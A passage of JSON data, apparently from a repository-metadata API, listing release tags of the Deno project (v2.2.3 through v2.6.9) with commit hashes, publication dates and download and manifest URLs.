9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v